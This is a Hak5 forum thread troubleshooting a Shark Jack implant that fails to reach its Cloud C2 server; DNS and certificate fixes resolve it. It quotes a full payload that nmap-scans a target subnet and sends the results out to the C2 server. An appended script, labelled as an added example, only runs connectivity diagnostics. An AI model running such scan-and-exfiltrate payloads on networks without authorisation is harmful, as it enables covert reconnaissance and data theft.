Sharkjack executes payloads but does not connect to C2


Peque


Posted

Hi Forum,

I've bought an essentialKit, and have most of it running as expected.

I've downloaded the payload from the Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2

The Sharkjack is updated to the latest firmware - version 1.1.0, and I can see the Sharkjack does everything that I want, the loot is created etc.
I can see that during execution of the payload the Sharkjack gets an IP on the target network - but nothing gets through to my C2 Cloud.

As far as I can see, it shouldn't be an issue with my C2 Cloud, since I have a WiFi Pineapple, LAN Turtle and Squirrel running and connecting to C2 Cloud.

How can I check this further, since as far as I can see I cannot SSH to the Sharkjack during a run of the payloads? I have tried reconfiguring my C2 Cloud settings on the jack several times without any luck.

The executed payload:

#!/bin/bash
#
# Title:         Nmap Payload for Shark Jack w/ C2
# Author:        Hak5 (modifications from REDD)
# Version:       1.1
#
# All credit goes to Hak5 Team. I just threw in a simple check for if
# C2 is provisioned in the SharkJack. - If so, exfiltrate!
#
# Scans target subnet with Nmap using specified options. Saves each scan result
# to loot storage folder. Exfiltrates all scans to C2 if provisioned.
#
# LED SETUP ... Obtaining IP address from DHCP
# LED ATTACK ... Scanning
# LED FINISH ... Scan Complete
#
# See nmap --help for options. Default "-sP" ping scans the address space for
# fast host discovery.

C2PROVISION="/etc/device.config"
NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
LOOT_DIR=/root/loot/nmap

# Setup loot directory, DHCP client, and determine subnet
LED SETUP
mkdir -p $LOOT_DIR
COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))
NETMODE DHCP_CLIENT
while [ -z "$SUBNET" ]; do
  sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
done

# Scan network
LED ATTACK
nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt

# Exfiltrate Loot to Cloud C2
if [[ -f "$C2PROVISION" ]]; then
  LED SPECIAL
  # Connect to Cloud C2
  C2CONNECT
  # Wait until Cloud C2 connection is established
  while ! pgrep cc-client; do sleep 1; done
  # Exfiltrate all test loot files
  FILES="$LOOT_DIR/*.txt"
  for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done
else
  # Exit script if not provisioned for C2
  LED R SOLID
  exit 1
fi

LED FINISH
sleep 2 && halt

Can I just disable the last 2 lines, so I can SSH into the jack to see what and if there's an error while trying to connect to my C2 Cloud?
Since everything else is working as intended, I do not get why I can't get this Sharkjack to deliver to my C2 Cloud.

Any ideas of what is wrong?
/P

Posted

Not sure if I missed reading some info, but have you gotten the Shark to connect to C2 at all? Not specifically delivering loot, but that you can see it as a connected device in the C2 interface. You could try a payload that just connects as a DHCP client (with sshd started) to a network and ssh into it and try to connect to C2 and extract loot manually looking for errors. Does the cc-client error log in /tmp tell anything? How are you running your C2 server? Using https?

Posted

I have placed the device.config in /etc/

Yes - my C2 is running https.
I have also tried the default payload --> which should just test the C2EXFIL - but still not getting anything to my C2 Cloud.

The only thing in cc-client-error is these 3 lines repeating:

[1646558183 !ERR     INITSYNC ]  Error in startup sync post
[1646558183 !ERR         MAIN ]  Device startup sync failed. Retrying... 
[1646558188 !ERR         CURL ]  Error posting update to server...

But other devices on the same network are working without problem.

Well - found the problem - internal DNS.
Since this is just a test setup at the moment, a separate network at home.
/etc/resolv.conf --> only nameserver 127.0.0.1
Adding my local DNS server (pfSense firewall) - and now I'm able to connect to the C2 Cloud.

Extra: Is it possible to make it add this DNS server automatically, as a failover DNS, so if the default DNS - 127.0.0.1 - does not resolve, then add a specified extra DNS server?

And thanks for the input - that gave me the answer.

1 year later...
Posted

Hi I am stuck here myself.  I have uploaded the device.config, ran C2CONNECT but when checking /tmp/cc-client-error.log I have the following:

[1679537734 !ERR     INITSYNC ]  Error in startup sync post
[1679537734 !ERR         MAIN ]  Device startup sync failed. Retrying...

Which just keeps repeating.  I had issues trying to UPDATE_FIRMWARE and UPDATE_PAYLOAD but was able to get those working properly by setting the date.  The SJC never checks in to C2 either.

Any help is appreciated, I have reviewed the forums and am striking out...
Posted
6 hours ago, dark_pyrro said:

Can you ping, for example, www.google.com from the Shark? Where is your C2 server located? Locally on your own network or accessible over internet?

Yes, I can ping my C2 instance, I can ping example.com and  8.8.8.8 or anything else from the SJC.  My C2 server is internet based.

1 month later...
Posted

Hey all! Just wanted to drop in and note my own experience. All of the above applied to me, but one thing I modified is that I stopped using self-signed certificates with openssl. Instead, I modified the service as per the guidance below, to ensure I use Let's Encrypt with the following switches enabled:

-hostname {hostname} -https

This allowed my SharkJack to quickly connect and transfer loot to the C2. It seems that it doesn't like self-signed certificates at all, which makes sense in hindsight.
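The two causes found in this thread (a resolv.conf that only lists 127.0.0.1, and a self-signed C2 certificate that cc-client refuses) can both be caught before C2CONNECT is called. The following is an added example, not Hak5's payload code and not from any poster here: it answers the earlier question about a failover DNS server by appending a secondary nameserver only when the C2 host fails to resolve, and then probes the C2 endpoint over HTTPS with full certificate validation so the diagnosis ends up in a loot file instead of being lost when the payload halts. It assumes a BusyBox-style shell with nslookup and curl on the device, a writable /etc/resolv.conf, and the placeholder values C2_HOST, C2_PORT and FALLBACK_DNS, which you replace with your own.

```shell
#!/bin/bash
# Added example (not Hak5 code): pre-flight checks for the Cloud C2 connection
# from a Shark Jack payload. Assumes nslookup and curl exist on the device and
# that /etc/resolv.conf is writable. All host/IP values below are placeholders.

C2_HOST="${C2_HOST:-c2.example.com}"          # placeholder: your C2 hostname
C2_PORT="${C2_PORT:-443}"
FALLBACK_DNS="${FALLBACK_DNS:-192.168.1.1}"   # placeholder: local resolver (e.g. the pfSense box)
RESOLV_CONF="${RESOLV_CONF:-/etc/resolv.conf}"

# Return 0 if the host resolves with the current resolver configuration.
dns_works() {
  nslookup "$1" >/dev/null 2>&1
}

# Append "nameserver <server>" to a resolv.conf unless it is already listed.
# Returns 0 when a line was added, 1 when the server was already present.
add_nameserver() {
  local conf="$1" server="$2"
  if grep -q "^nameserver[[:space:]]*$server[[:space:]]*$" "$conf" 2>/dev/null; then
    return 1
  fi
  printf 'nameserver %s\n' "$server" >> "$conf"
}

# Failover: only if the C2 host does not resolve, add the secondary DNS and retry.
ensure_dns() {
  dns_works "$C2_HOST" && return 0
  add_nameserver "$RESOLV_CONF" "$FALLBACK_DNS"
  dns_works "$C2_HOST"
}

# Translate curl's exit status into the failure the posters in this thread hit.
explain_curl_status() {
  case "$1" in
    0)  echo "ok" ;;
    6)  echo "dns: could not resolve host (check $RESOLV_CONF)" ;;
    7)  echo "connect: server unreachable or port closed" ;;
    28) echo "timeout: no answer from server" ;;
    60) echo "tls: certificate not trusted (self-signed cert; use a CA-issued cert such as Let's Encrypt)" ;;
    *)  echo "curl exit $1" ;;
  esac
}

# Probe the C2 endpoint the way cc-client does: HTTPS with certificate validation on.
check_c2_tls() {
  curl -sS -o /dev/null --max-time 10 "https://$C2_HOST:$C2_PORT/" >/dev/null 2>&1
  explain_curl_status $?
}

# Run both checks and record the verdict in loot, so it survives the final halt.
# Usage inside a payload, before C2CONNECT:
#   c2_preflight || { LED R SOLID; exit 1; }
c2_preflight() {
  local log="${1:-/root/loot/c2-preflight.log}" result
  if ! ensure_dns; then
    echo "dns: $C2_HOST does not resolve even with $FALLBACK_DNS added" >> "$log"
    return 1
  fi
  result="$(check_c2_tls)"
  echo "$result" >> "$log"
  [ "$result" = "ok" ]
}
```

The nameserver is appended rather than replacing 127.0.0.1, so the device's own resolver keeps priority and the fallback is only consulted when it fails; the TLS probe uses curl's default certificate validation, which is the same thing cc-client's CURL module is doing when it logs "Error posting update to server".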
